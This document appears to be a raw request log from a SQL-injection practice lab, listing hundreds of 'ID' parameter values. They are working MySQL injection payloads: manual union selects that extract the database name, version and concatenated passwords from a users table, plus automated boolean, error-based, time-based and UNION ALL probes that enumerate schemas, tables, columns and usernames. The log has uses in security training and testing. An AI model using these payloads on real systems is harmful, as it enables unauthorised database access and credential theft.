ID:1
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1
ID:1
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1
ID:1'
ID:1'
ID:1'
ID:1' union select 1,2,3
ID:1' union select 1,2,3-- 
ID:1
ID:1'
ID:1' union select 1,2,3-- 
ID:1
ID:12345'
ID:12345' union select 1,group_concat(password),3 from security.users -- 
ID:12345'
ID:12345' union select 1,2,3 -- 4
ID:12345' union select 1,database(),@@version -- 
ID:1
ID:1'
ID:1'
ID:1'
ID:1213213'
ID:1213213' union select 1,2,3 -- 
ID:1213213' union select 1,database(),3 -- 
ID:1213213' union select 1,database(),@@version -- 
ID:1
ID:1123123' union select 1,database(),@@version -- 
ID:1
ID:1
ID:1
ID:1
ID:1559
ID:6685
ID:1)"((('(.)(
ID:1'NeVNGr<'">EZZtzW
ID:1) AND 2622=3763 AND (9795=9795
ID:1) AND 8002=8002 AND (6148=6148
ID:1 AND 4258=9932
ID:1 AND 8002=8002
ID:1 AND 5372=4974-- tufJ
ID:1 AND 8002=8002-- gnJx
ID:1') AND 7226=7052 AND ('RYMB'='RYMB
ID:1') AND 8002=8002 AND ('XcMV'='XcMV
ID:1' AND 1620=5406 AND 'iqKO'='iqKO
ID:1' AND 8002=8002 AND 'xBxl'='xBxl
ID:1' AND 2570=8394 AND 'KFen'='KFen
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b6a7671,(SELECT (ELT(5029=5029,1))),0x716b706a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'VWzf'='VWzf
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b6a7671,(SELECT (ELT(1012=1012,1))),0x716b706a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xmSi'='xmSi
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716b6a7671,(SELECT (ELT(8602=8602,1))),0x716b706a71,0x78))x)) AND 'LLsn'='LLsn
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x716b6a7671,(SELECT (ELT(6860=6860,1))),0x716b706a71,0x78))x)) AND 'xOka'='xOka
ID:1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x716b6a7671,(SELECT (ELT(3429=3429,1))),0x716b706a71)) USING utf8))) AND 'DNAH'='DNAH
ID:1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x716b6a7671,(SELECT (ELT(6315=6315,1))),0x716b706a71)) USING utf8))) AND 'dYPh'='dYPh
ID:1' AND (SELECT 6195 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT (ELT(6195=6195,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'BJnI'='BJnI
ID:(SELECT CONCAT(0x716b6a7671,(SELECT (ELT(1666=1666,1))),0x716b706a71))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'nzme'='nzme
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))bnlD)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))GFeE) AND 'VyVu'='VyVu
ID:1';SELECT BENCHMARK(5000000,MD5(0x73576474))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x69416f78)) AND 'CCJO'='CCJO
ID:1' AND SLEEP(5) AND 'wGYx'='wGYx
ID:1' AND SLEEP(0) AND 'wGYx'='wGYx
ID:1' AND SLEEP(5) AND 'wGYx'='wGYx
ID:1' ORDER BY 1-- qGyf
ID:1' ORDER BY 2203-- GfkG
ID:1' ORDER BY 10-- hMfy
ID:1' ORDER BY 6-- tQAW
ID:1' ORDER BY 4-- xtmz
ID:1' ORDER BY 3-- XcnM
ID:1' UNION ALL SELECT NULL,CONCAT(0x716b6a7671,0x6547456961705a704a706c465a534d7667584d584b4b474c497442534e6741696c48797a4575436d,0x716b706a71),NULL-- RIzr
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x47445861777341726a6265597558737879787a546d4e6e7772597378536166724459466b73564479,0x716b706a71)-- APsp
ID:1' UNION ALL SELECT CONCAT(0x716b6a7671,0x7a6f6a716371776871724d714b436d796a6571546242676c4846534455637a684e4e4a4d61637361,0x716b706a71),NULL,NULL-- lJLr
ID:1' UNION ALL SELECT NULL,CONCAT(0x716b6a7671,0x7863466b5961426b5254,0x716b706a71),NULL-- WcSB
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x77724778416b71696b72,0x716b706a71)-- ehfo
ID:1' UNION ALL SELECT CONCAT(0x716b6a7671,0x4b78465a427047687572,0x716b706a71),NULL,NULL-- aWDj
ID:-9553' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x776a6756486c504568696f626b6a6a6375566b5a7479685a7458715172414f5747536c62797a4e61,0x716b706a71)-- AgeQ
ID:-1464' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,(CASE WHEN (3064=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3064) THEN 1 ELSE 0 END),0x716b706a71)-- smou
ID:-6183' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20),0x716b706a71) FROM INFORMATION_SCHEMA.SCHEMATA-- RsNT
ID:1' AND (SELECT 2324 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT REPEAT(0x34,1024)),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DXPU'='DXPU
ID:1' AND (SELECT 7571 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT REPEAT(0x32,512)),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'BJkZ'='BJkZ
ID:1' AND (SELECT 6610 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT REPEAT(0x36,256)),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MyCw'='MyCw
ID:1' AND (SELECT 2385 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT REPEAT(0x34,54)),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'SVQm'='SVQm
ID:1' AND (SELECT 5502 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Yhdm'='Yhdm
ID:1' AND (SELECT 9489 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZccA'='ZccA
ID:1' AND (SELECT 3378 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsDo'='NsDo
ID:1' AND (SELECT 1187 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Obak'='Obak
ID:1' AND (SELECT 2316 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tPNu'='tPNu
ID:1' AND (SELECT 6255 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bOLt'='bOLt
ID:1' AND (SELECT 5935 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'eRDk'='eRDk
ID:1' AND (SELECT 3098 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zULc'='zULc
ID:1
ID:-7560' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716b706a71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)-- KHGk
ID:1' AND (SELECT 1074 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qtIo'='qtIo
ID:1' AND (SELECT 5161 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 0,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VyBa'='VyBa
ID:1' AND (SELECT 1545 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 1,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'uTYM'='uTYM
ID:1' AND (SELECT 1988 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 2,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MYAi'='MYAi
ID:1' AND (SELECT 8294 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 3,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZYgf'='ZYgf
ID:1
ID:-8657' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716b706a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479-- Aimp
ID:1' AND (SELECT 7825 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'THgG'='THgG
ID:1' AND (SELECT 7742 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gWvb'='gWvb
ID:1' AND (SELECT 1466 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oDER'='oDER
ID:1' AND (SELECT 1997 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Awwd'='Awwd
ID:1' AND (SELECT 9946 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VaCn'='VaCn
ID:1' AND (SELECT 2655 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 2,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pvyc'='pvyc
ID:1' AND (SELECT 8075 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 2,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'eixN'='eixN
ID:1
ID:-3564' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,IFNULL(CAST(COUNT(username) AS CHAR),0x20),0x716b706a71) FROM security.users-- DLrd
ID:1' AND (SELECT 8557 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT IFNULL(CAST(COUNT(username) AS CHAR),0x20) FROM security.users),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wEkQ'='wEkQ
ID:1' AND (SELECT 7169 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 0,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NvpL'='NvpL
ID:1' AND (SELECT 3933 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 1,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'RSzt'='RSzt
ID:1' AND (SELECT 4506 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 2,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wOOK'='wOOK
ID:1' AND (SELECT 7074 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 3,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wcuU'='wcuU
ID:1' AND (SELECT 3465 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 4,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nlNy'='nlNy
ID:1' AND (SELECT 6347 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 5,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Wuby'='Wuby
ID:1' AND (SELECT 8561 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 6,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Shnp'='Shnp
ID:1' AND (SELECT 4895 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 7,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'BEyu'='BEyu
ID:1' AND (SELECT 8719 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 8,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZMdZ'='ZMdZ
ID:1' AND (SELECT 4993 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 9,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CmHZ'='CmHZ
ID:1' AND (SELECT 2372 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 10,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XAum'='XAum
ID:1' AND (SELECT 7633 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 11,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XHSK'='XHSK
ID:1' AND (SELECT 6195 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,54) FROM security.users ORDER BY username LIMIT 12,1),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AuBH'='AuBH
ID:1123123' union select 1,database(),group_concat(password) from security,3 -- 
ID:1123123' union select 1,database(),group_concat(password) from security -- 
ID:1123123' union select 1,database(),group_concat(password) from security.users -- 
ID:1123123' union select 1,database(),group_concat(password) from security.users and password=crappy  -- 
ID:1
ID:1213123' union select 1,2,3 -- 
ID:1213123' union select 1,database(),3 -- 
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1
ID:1'
ID:1'
ID:1
ID:1'
ID:1'
ID:1' select 1 from information_schema.columns -- 
ID:12345 union select 1,2,3 -- 
ID:'12345 union select 1,2,3 -- '
ID:1'12345 union select 1,2,3 -- '
ID:1 '12345 union select 1,2,3 -- '
ID:1 ' union select 1,2,3 -- '
ID:1
ID:1,sleep(40),3 -- 
ID:1,sleep(40),database() -- 
ID:1,sleep(4),database() -- 
ID:1,sleep(4),database() -- 
ID:1,sleep(4),database() -- 
ID:1,sleep(40),database() -- 
ID:1,sleep(40),database() -- 
ID:1,sleep(40),database() -- 
ID:1-- 
ID:1'
ID:1' or select 1,sleep(40),3 -- 
ID:' 1321123123213123' union select 1,2,3 -- 
ID:1321123123213123' union select 1,2,3-- 
ID:1321123123213123' union select 1,sleep(40),3-- 
ID:1'
ID:1'
ID:1
ID:1213123' union select 1,database,@@version -- 
ID:1213123' union select 1,database,3-- 
ID:1213123' union select 1,database(),3-- 
ID:1213123' union select 1,database(),@@version-- 
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1123123123' union select 1,2,3 -- 
ID:1123123123' union select 1,2,3 -- 
ID:1123123123' union select 1,2,3 -- 
ID:1123123123' union select 1,2,3 -- 
ID:1123123123' union select 1,2,3 -- 
ID:1123123123' union select 1,2,3 -- 
ID:1123123123' union select 1,2,3 -- 
ID:1123123123' union select 1,2,3 -- 
ID:1
ID:1123123' union select 1,2,3 -- 
ID:1123123' union select 1,database(),3 -- 
ID:1
ID:1'
ID:1'
ID:1
ID:1'
ID:1123123' union select 1,database(),version@@ -- 
ID:1123123' union select 1,database(),3 -- 
